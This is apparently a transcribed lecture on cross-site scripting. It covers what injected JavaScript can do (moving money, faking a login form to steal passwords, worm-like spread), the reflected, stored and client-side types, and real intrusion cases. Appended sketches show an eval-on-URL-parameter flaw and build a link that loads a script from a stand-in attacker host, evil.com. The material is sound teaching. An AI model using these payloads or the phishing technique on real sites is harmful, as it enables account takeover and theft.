What types of requests can you make with JavaScript? Ajax requests to the same domain. Does a web application care if you're making Ajax requests versus normal HTTP requests? No, they almost never can tell the difference. Usually, I think you technically can do something better
than Ajax, but for all intents and purposes, no. So what would something like bank.com allow you to do? Nobody's used a banking website before? Transfer money. That's just an HTTP request, and if it comes from JavaScript in the same origin as bank.com, it's going to get sent all of those cookies along with the Ajax request. So you can steal or transfer money; it's as evil as you're willing to be. You could apply for loans. What about changing their password? You may be able to change their password; it depends on the functionality there. We saw that one of the main features of JavaScript, and the reason it was invented, was to dynamically update and change the DOM, right, the whole UI of the page. So what if we wanted to steal their username? They're already logged in, so it doesn't show them the login page. But we have control over the UI of their page, so if we change the UI so it looks exactly like the login page, and then they type in their username and password, instead of going to bank.com we could just change the form action so it goes to us, or we can have JavaScript intercept that request, steal the username and password, and then maybe even log them in, or just change the web page back to the normal thing so it looks like they've logged in. What else could we do? Maybe change the email associated with their account. We could. Let's say we're really, really good now, and we'll see an example of this later: in a lot of banks now you can send people money or something like that, or maybe even send a note or a message to somebody. You could send that note or message with a link to this cross-site scripting attack, and when that person clicks on the link, now the JavaScript code is executing in their browser, and so you have this viral spread of infections. Good. The one thing I'm glad that nobody said: you can also steal their cookies. You can steal their cookies
and send them to the attacker; now the attacker could potentially log into the website. But honestly, we've seen there's a lot of different measures that protect deliberately against that. We saw a measure, I believe it's HttpOnly, so that cookies are only sent through HTTP and are not accessible to JavaScript, particularly for this reason. And this is kind of the standard answer: whenever most people say, oh, cross-site scripting, they think stealing cookies. But really you don't need to steal the cookie. The browser has the cookie; it will send that cookie along with any HTTP request that you send. So you don't need that at all; you can do any action on the website that the user can. This is an example of what we call reflected cross-site scripting, where the input is in the URL, so the web application takes some input from a URL parameter and reflects it back at the user. I don't really like the name, but I think we're stuck with it. So let's look at an example. The other type would be stored cross-site scripting, where you can think of the JavaScript code as stored in the database, such that everybody who views that page sees it. There's two ideal examples. For reflected, it would be a search functionality in a web application: you type in your search term, you want to search for foo bar, and it takes you to a search page that says you searched for this. That's like a classic reflected case. Comments on a blog are a great stored SQL, sorry, stored cross-site scripting: basically you make a comment including JavaScript code, and then everybody who views that page gets that JavaScript code, not just you. It is nice that we have this distinction, because for a stored cross-site scripting you don't have to trick somebody into visiting that particular link; you only need to trick them into visiting the particular page that has that content. The third one, and actually I'm going to stop using this term, is called DOM-based cross-site
scripting, but I prefer the term client-side. The whole idea is that attacker-controlled JavaScript executes in the same origin, so the question is, where does it come from? Does it come from the URL or the database, in which case the server-side code is responsible, because it is concatenating strings together to send to the browser? But JavaScript, as we saw, has a lot of awesome functionality, like an eval function, which turns a string into code. So if the JavaScript code running in your browser, written by the developer, takes your user input, like one of the URL parameters, and calls eval on it, then that's a cross-site scripting vulnerability. It's called DOM-based because it usually happens in the DOM. I like the term client-side XSS, and the terminology is starting to change, so I'm making a push for that. So for reflected XSS, we already saw this example with the username, so I'm not going to go over this too much. We can see this in here; this is kind of one of the standard things. So this seems very simple, right? I mean, this core idea: the browser has to end up with JavaScript; there's no other way you can do it. What are all the ways we can trick the browser into executing JavaScript? Script tags, the obvious one. What else? What was that? External JavaScripts, eval functions, what else? How did we do our validation when we did client-side validation?
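As a rough illustration of the client-side case described above, here is a sketch of developer-written JavaScript that calls eval on a URL parameter. The parameter name calc and the function showResult are hypothetical, made up for this sketch; in a real page the URL would come from location.href, and it is passed in as an argument here only so the example runs under Node.js.

```javascript
// Hypothetical developer code: supports links like ?calc=1%2B2 by evaluating
// the "calc" URL parameter. The parameter is user input, so eval turns
// whatever an attacker puts in the link into code running in the page's origin.
function showResult(pageUrl) {
  const expr = new URL(pageUrl).searchParams.get("calc");
  return eval(expr); // string -> code: this is the vulnerability
}

// Intended use: simple arithmetic (%2B is the URL encoding of "+").
console.log(showResult("http://bank.com/page?calc=1%2B2")); // prints: 3

// Attacker-crafted link: the "expression" is arbitrary JavaScript.
// Here it only sets a flag, standing in for whatever the attacker wants to run.
showResult("http://bank.com/page?calc=globalThis.attackerRan%3Dtrue");
console.log(globalThis.attackerRan); // prints: true
```

Notice that the string-to-code step happens entirely in the developer's own JavaScript, which is why the client-side name fits.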
Yeah, it was onsubmit. On HTML elements there are handlers that you can set to be JavaScript, so onsubmit. A classic one when you do cross-site scripting: here's an image tag with an onerror handler, and that is a string that gets turned into JavaScript code. So there's a lot of different ways to trick the browser into executing JavaScript; that is part of what makes it difficult. The other part comes in with how do you do it; it's very tricky. Okay, we talked about all of this. So this is an example of a DOM-based one. This was fake, this is not real, I just changed the URL, but the idea would be you go to www.facebook.com slash script source hdbs.com slash hacker. What you'd see if you went to this would be, if you were logged in, the normal Facebook page would pop up and the JavaScript would execute. So if you think about it, this is much more effective than a normal phishing attack, because you are on facebook.com, you are still on facebook.com, you have the green lock, everything is telling you this is facebook.com, you just need to log back in, but you have no indication that some attacker-controlled JavaScript is executing. Cool. So we talked about stored cross-site scripting. Stored cross-site scripting has a lot more potential, thinking about all the different ways that anyone who visits that page can be exploited. We covered that. Great. That was actually one of my questions: I can understand putting the URL out there globally, where anybody can visit it, but how would you target somebody with this? How would I target somebody, someone like you specifically, to click on this? Yeah, so to target somebody specifically, well, for a stored cross-site scripting you still need to get them to visit the page. So, I mean, how it's been done in the past: for instance, Aurora was an attack against Google where the attackers, to get a foothold, compromised some Facebook accounts that were friends with the target victim, chatted with them a little bit, and sent them, hey, you should
check out this super cool link. And I think they sent them one link first that basically fingerprinted their system to figure out exactly what software they were running, and then they used a 0-day or N-day exploit against that, and then later they had to click on another link, and from there they got access onto the corporate network and then spread throughout the network. I think that attack was called Aurora, if you want to look that up; there's a lot of stuff in there. So yeah, your friends is how I would target you directly. Or the other one, sorry, since we're on this topic, the other interesting thing is the watering hole attack. So let's say you want to target a military organization or even a specific base. You would look at what food places are around that location, and you would target their systems, because you know employees are going to visit the menus from their computers. So from there you can take them over just from that information alone. So the final example I'll talk about: there was a case, I want to say something to do with Yankee was the name, that's in my head, but basically the military in the US has a completely separate network from the internet, like MILNET, it's completely different. They at one point found that some systems on the MILNET were talking to Russian systems, which is a big no-no. What they found out when they traced what happened is that Russian agents planted USB drives in a convenience store that was right by this military base, and this was like five years prior or something. And so it took one person making the mistake of taking that USB drive, and even though they knew they should not plug it into a classified system, they just had to do it, for whatever reason. They plugged it in, and it got onto that system and propagated from there. So these kinds of persistent, long-term attacks can definitely do some fun stuff. All right, we'll stop here. Thanks.
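Going back to the reflected example from earlier in the lecture, here is a small sketch of how the link is built and what comes back. The function renderGreeting is a hypothetical JavaScript stand-in for the PHP page (static HTML around an unescaped username parameter), and evil.com with stealmoney.js is the made-up attacker host and file from the example. It is a sketch under those assumptions, runnable with Node.js, not the actual code from the slides.

```javascript
// Hypothetical stand-in for the PHP page: static HTML with the raw
// "username" GET parameter concatenated into the middle, unescaped.
function renderGreeting(requestUrl) {
  const username = new URL(requestUrl).searchParams.get("username") || "";
  return "<html><h1>Hello " + username + "</h1></html>";
}

// The attacker's value for the username parameter: an external script reference.
const payload = '<script src="http://evil.com/stealmoney.js"></script>';

// URL-encode it so the link shows percent escapes instead of visible tags.
const link = "http://bank.com/?username=" + encodeURIComponent(payload);
console.log(link);

// The server decodes the parameter and echoes it back, so the script tag
// ends up inside the page that the browser parses as bank.com's HTML.
console.log(renderGreeting(link));
```

The encoded link contains no angle brackets, yet the page that comes back contains the full script tag, which is what the browser then treats as part of bank.com.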